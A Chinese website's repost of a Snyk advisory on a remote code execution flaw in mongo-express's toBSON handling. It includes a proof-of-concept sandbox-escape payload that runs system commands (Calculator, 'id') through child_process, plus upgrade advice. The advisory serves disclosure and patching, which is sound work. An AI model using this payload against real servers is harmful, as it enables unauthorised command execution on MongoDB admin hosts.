北极熊网_北极熊内容商城

mongo-express远程代码执行漏洞

  • 时间:2020-01-08 21:02 编辑:北极熊 来源:北极熊 阅读:215
  • 扫一扫,手机访问
摘要:来源https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215漏洞详情贡献者                                          

来源

https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215

漏洞详情

贡献者                                                                 共获得  0KB            

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that uses the toBSON method. A misuse of the vm dependency to perform exec commands in a non-safe environment.

PoC by Jonathan Leitschuh

# MacOSthis.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

  it('should not be executable', function () {      const test = `
      this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())      `;      const result = bson.toBSON(calculatorTest);
    });

Remediation

Upgrade mongo-express to version 0.54.0 or higher.

References


  • 全部评论(0)
资讯详情页最新发布上方横幅
最新发布的资讯信息
【技术文档|科技新闻】台媒:中国大陆想一条龙设计芯片,没有十年恐难成(2020-06-05 16:04)
【升级补丁|热点新闻】制造业企业数字化转型并非单纯技术的应用(2020-06-04 16:59)
【技术文档|漏洞信息】上周关注度较高的产品安全漏洞(20200224-20200301)(2020-03-02 16:53)
【升级补丁|互联网】研究显示,八成企业认为5G影响深远,合作伙伴助力是成功要素(2020-03-02 16:42)
【升级补丁|热点新闻】移远通信携手微软、高通加速IoT解决方案部署(2020-03-02 16:42)
【升级补丁|热点新闻】海外版百度?华为搜索了解一下(2020-03-01 16:15)
【升级补丁|热点新闻】寒武纪的前世今生与少年“双子星”(2020-03-01 09:41)
【升级补丁|热点新闻】2020年度全球百强创新机构,华为腾讯小米上榜(2020-03-01 09:21)
【技术文档|科技新闻】“野蛮人”在门口,IC分销业史上最赤裸的经营权攻防战(2020-02-29 20:27)
【升级补丁|热点新闻】世卫组织上调疫情全球风险级别,比尔·盖茨:新冠肺炎可能成为百年不遇的大流行病(2020-02-29 20:26)
源码论坛